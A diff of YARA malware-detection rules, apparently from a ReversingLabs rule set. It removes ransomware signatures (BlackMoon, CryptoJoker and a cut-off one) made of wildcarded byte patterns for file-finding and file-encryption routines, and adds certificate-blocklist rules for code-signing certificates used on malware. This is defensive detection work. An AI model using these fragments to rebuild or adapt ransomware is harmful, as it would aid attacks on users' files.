-            ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B
-            8D ?? ?? ?? ?? 8D 41 ?? 66 83 F8 ?? 77 ?? 8D 41 ?? 0F B7 F8 EB ?? 0F B7 F9 0F B7 03
-        }
-		$find_files_v2_p2 = {
-            8B F0 8B C8 83 C1 ?? 66 83 F9 ?? 8D 46 ?? 0F B7 D0 8B C6 0F 47 D0 66 3B FA 8B 95 ??
-            ?? ?? ?? 75 ?? 83 FA ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 70 ?? 66 8B 08 83 C0
-            ?? 66 85 C9 75 ?? 2B C6 D1 F8 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FA ?? 0F 84 ?? ??
-            ?? ?? 81 FA ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 C2 ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 8D 85
-            ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83
-            C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D
-            4D ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 33 C0 53 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55
-            ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 53 66 89 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 66 83 F8
-        }
-		$find_files_v2_p3 = {
-            75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 51 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? EB ?? 66 83 F8 ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 66 89 85 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 66 83 F8 ?? 75 ?? 8D 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 33 F6 0F 1F 00
-            80 BE ?? ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? 74 ?? 57 6A ?? 6A ?? 51 E8 ?? ?? ?? ?? 46 83
-            C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? FF 15 ?? ?? ?? ??
-            5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_v2_p1 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 51 53 81 EC ?? ?? ?? ?? 53 56 57 89 65
-            ?? 8B F1 89 75 ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 85 ?? ?? ?? ?? 0F 11 45 ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 0F 13 45 ?? 66 0F 13
-            45 ?? 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 56 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 8E ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4E ?? 0F 1F 80 ?? ?? ?? ??
-            66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 83 C6 ?? 89 75 ?? C7 45 ?? ?? ?? ?? ??
-            33 C9 8B C6 BA ?? ?? ?? ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            F8 89 7D ?? 33 C0 66 89 07 FF 75 ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56
-            57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 57 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 8E ??
-            ?? ?? ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
-            8B CA 89 4D ?? 85 C9 0F 8C ?? ?? ?? ?? 7F ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 89 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? BA ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 90 68 ?? ?? ?? ?? 57 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 89
-        }
-		$encrypt_files_v2_p2 = {
-            4D ?? 99 8B F0 89 75 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 7E ?? B9 ??
-            ?? ?? ?? 8B F7 8D BD ?? ?? ?? ?? F3 A5 8D 45 ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 7D ??
-            57 8B 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 75 ?? 56 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 51 57 8D 85
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50
-            56 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50
-            FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 03 C6 89 45 ?? 8B 4D ?? 13 4D ?? 89 4D ??
-            3B 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 45 ?? 0F 82 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF
-            75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
-            ?? ?? 8B F0 89 75 ?? 56 51 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 57 E8
-            ?? ?? ?? ?? 6A ?? 8B D7 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ??
-            8D 70 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 56 8B D0 8B 7D ?? 8B CF E8 ?? ?? ?? ??
-            83 C4 ?? 56 8B 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 8B CF E8 ?? ??
-            ?? ?? 8B 45 ?? 85 C0 74 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 7D ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 75 ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ??
-            ?? ?? 83 C4 ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D 8B E3 5B C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOV Intalev Ukraina" and ( pe.signatures [ i ] . serial == "00:e0:14:07:87:1e:21:46:c9:ba:ab:1a:e7:ab:8a:b1:72" or pe.signatures [ i ] . serial == "e0:14:07:87:1e:21:46:c9:ba:ab:1a:e7:ab:8a:b1:72" ) and 1464220800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Effc6D19D6Fc85872E4E5B3Ccee6D301 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "56114e31-2e9b-5d16-8435-708bbb2687cc"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12856-L12874"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "a746c4193f1264cb96eae0ea85c2c76b5caf3b72ca950f76af426b4d68d210b3"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $manage_gui_p* ) ) and ( ( ( all of ( $find_files_v1_p* ) ) and ( all of ( $encrypt_files_v1_p* ) ) ) or ( ( all of ( $find_files_v2_p* ) ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C\\xC3\\x93IR IP LIMITED" and ( pe.signatures [ i ] . serial == "00:ef:fc:6d:19:d6:fc:85:87:2e:4e:5b:3c:ce:e6:d3:01" or pe.signatures [ i ] . serial == "ef:fc:6d:19:d6:fc:85:87:2e:4e:5b:3c:ce:e6:d3:01" ) and 1572307200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Blackmoon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2F4A25D52B16Eb4C9Dfe71Ebbd8121Bb : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BlackMoon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "95ebb6c4-b0c9-5f9a-8424-a2f4d33953eb"
-		date = "2020-11-11"
-		modified = "2020-11-11"
+		id = "1afd5d2b-fd6d-58ca-b966-788d465cd0ed"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BlackMoon.yara#L1-L70"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12876-L12892"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "428409096a8637978bf2a1efb3238e4ba87715a909693b0cd26c0f689d567a09"
+		logic_hash = "7b237ae0574afeafcc05f71512c09d3170edbee20e512a1b0af5b431923dc25c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BlackMoon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            81 EC ?? ?? ?? ?? 53 8B 9C 24 ?? ?? ?? ?? 55 56 8B 33 57 8B BC 24 ?? ?? ?? ?? 33 ED
-            85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 76 ?? 85 F6 74 ?? 83 FE ?? 74 ?? 56 FF
-            15 ?? ?? ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 89 33 74 ?? 8B 84
-            24 ?? ?? ?? ?? 85 C0 74 ?? 8B 4C 24 ?? 83 E1 ?? 80 F9 ?? 74 ?? EB ?? 8B 94 24 ?? ??
-            ?? ?? 8B 44 24 ?? 85 C2 74 ?? BD ?? ?? ?? ?? 85 F6 74 ?? 83 FE ?? 74 ?? 85 ED 75 ??
-            8B 84 24 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 C0 8D 44 24 ?? 50 56 74 ?? FF D7 85 C0 74
-            ?? 8B 4C 24 ?? 83 E1 ?? 80 F9 ?? 75 ?? 8D 54 24 ?? 52 56 FF D7 85 C0 75 ?? 5F 5E 5D
-            33 C0 5B 81 C4 ?? ?? ?? ?? C3 FF D7 85 C0 74 ?? 8B 9C 24 ?? ?? ?? ?? 85 5C 24 ?? 75
-            ?? 8D 4C 24 ?? 51 56 FF D7 85 C0 75 ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 8D 54 24 ??
-            52 E8 ?? ?? ?? ?? 40 50 E8 ?? ?? ?? ?? 8B D0 8D 7C 24 ?? 83 C9 ?? 33 C0 83 C4 ?? F2
-            AE F7 D1 2B F9 8B C1 8B F7 8B FA C1 E9 ?? F3 A5 8B C8 8B C2 83 E1 ?? F3 A4 5F 5E 5D
-            5B 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ??
-            B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? DB
-            45 ?? DD 5D ?? DD 45 ?? DB 45 ?? DD 5D ?? DC 65 ?? DD 5D ?? DD 45 ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B
-            5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D
-            ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
-        }
-		$encrypt_files_p2 = {
-            83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89
-            45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
-            8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ??
-            ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A
-            ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ??
-            B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85
-            DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
-            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Blist LLC" and pe.signatures [ i ] . serial == "2f:4a:25:d5:2b:16:eb:4c:9d:fe:71:eb:bd:81:21:bb" and 1629763200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_6889Aab6202Bcc5F11Caedf4D04F435B : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "d4499a1d-aa8d-5056-ad91-439f27f00c33"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12894-L12910"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "b2261ed8001929be8f80f73cc0c5076138f4794c73cbffd63773da5fc44639a8"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C4DL Media" and pe.signatures [ i ] . serial == "68:89:aa:b6:20:2b:cc:5f:11:ca:ed:f4:d0:4f:43:5b" and 1231891200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cryptojoker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3Be63083Fbb1787B445Da97583721419 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CryptoJoker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "50a9280b-a352-5a2b-acee-5690e509dfd7"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "6839595d-b645-5963-bd96-a668bfdd667f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.CryptoJoker.yara#L1-L140"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12912-L12928"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "42ee1e63ada1ae986f43a1300eda0b1fa7b54c26be31ef5637bb321defffbe40"
+		logic_hash = "f39f5a632544bc01c3b4c9e2f2dd33f7109c44375f54011a34181e10da79debc"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CryptoJoker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$call_encrypt = {
-            2B 02 26 16 FE 09 00 00 FE 09 01 00 FE 09 02 00 6F ?? ?? ?? ?? 2A
-        }
-		$encrypt_files = {
-            2B 02 26 16 20 04 ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 26 20 00 04 ?? ?? 73 ?? ?? ?? ?? 0C 20 05 ?? ?? ??
-            16 39 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 20 04 ?? ?? ?? FE ?? ?? ?? FE ?? ??
-            ?? 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 38 ?? ?? ?? ?? 26
-            20 03 ?? ?? ?? 16 39 ?? ?? ?? ?? 26 00 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ??
-            ?? ?? ?? 26 20 00 ?? ?? ?? 38 ?? ?? ?? ?? 00 00 08 06 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ??
-            ?? ?? 26 20 03 ?? ?? ?? 38 ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 13 04 20 04 ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ??
-            26 00 08 07 17 28 ?? ?? ?? ?? 0D 38 ?? ?? ?? ?? 20 03 ?? ?? ?? FE ?? ?? ?? FE ?? ?? ?? 45 ?? ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 38 ?? ?? ?? ?? 26 20 02 ?? ?? ?? 38 ?? ?? ?? ?? 11 04
-            13 05 DD ?? ?? ?? ?? 00 08 16 28 ?? ?? ?? ?? 00 00 DC 08 14 FE 01 13 06 11 06 3A ?? ?? ?? ?? 08 28 ?? ?? ??
-            ?? 00 DC 00 11 05 2A
-        }
-		$start_process = {
-            2B ?? 26 16 20 10 ?? ?? ?? 38 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 20 ?? ?? ?? ??
-            38 ?? ?? ?? ?? 00 11 05 17 28 ?? ?? ?? ?? 20 06 ?? ?? ?? 38 ?? ?? ?? ?? 00 28 ?? ?? ?? ??
-            0A 20 09 ?? ?? ?? 38 ?? ?? ?? ?? 00 11 05 08 28 ?? ?? ?? ?? 20 12 ?? ?? ?? 38 ?? ?? ?? ??
-            11 06 17 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38
-            ?? ?? ?? ?? 11 05 17 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 06 19 20 ?? ?? ?? ??
-            28 ?? ?? ?? ?? A2 20 0F ?? ?? ?? 38 ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 13 06 20 02 ?? ?? ?? 38
-            ?? ?? ?? ?? 00 11 04 28 ?? ?? ?? ?? 26 20 13 ?? ?? ?? 38 ?? ?? ?? ?? 08 09 28 ?? ?? ?? ??
-            20 07 ?? ?? ?? 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 05 38 ?? ?? ?? ?? 26 20 0D ?? ?? ?? 38 ??
-            ?? ?? ?? 11 06 0D 38 ?? ?? ?? ?? 20 10 ?? ?? ?? FE ?? ?? ?? FE ?? ?? ?? 45 ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 20 08 ?? ?? ?? 17 3A ?? ?? ?? ??
-            26 11 06 18 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 20 00 ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ??
-            26 06 07 28 ?? ?? ?? ?? 0C 20 0B ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 26 11 06 16 20 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? A2 17 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 26 20 03 ?? ?? ?? 16 39 ?? ??
-            ?? ?? 26 00 11 04 11 05 28 ?? ?? ?? ?? 20 0A ?? ?? ?? 17 3A ?? ?? ?? ?? 26 00 73 ?? ?? ??
-            ?? 13 04 20 04 ?? ?? ?? 38 ?? ?? ?? ?? 2A
-        }
-		$msgbox_timer = {
-            00 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 28 ?? ?? ?? ?? 0C
-            00 02 7B ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 DE 12 08 14 FE 01
-            13 04 11 04 2D ?? 08 6F ?? ?? ?? ?? 00 DC 00 02 7B ?? ?? ?? ?? 16 32 0E 02 7B
-            ?? ?? ?? ?? 16 FE 04 16 FE 01 2B ?? 16 00 13 04 11 04 2D ?? 00 02 7B ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 38 ?? ?? ?? ?? 02 7B ??
-            ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 16 FE 01 16 FE 01 2B
-            ?? 17 00 13 04 11 04 2D ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ??
-            ?? 0D 09 17 6F ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F 40 28 ??
-            ?? ?? ?? 26 00 38 ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 17 FE 04 16 FE 01 13 04 11
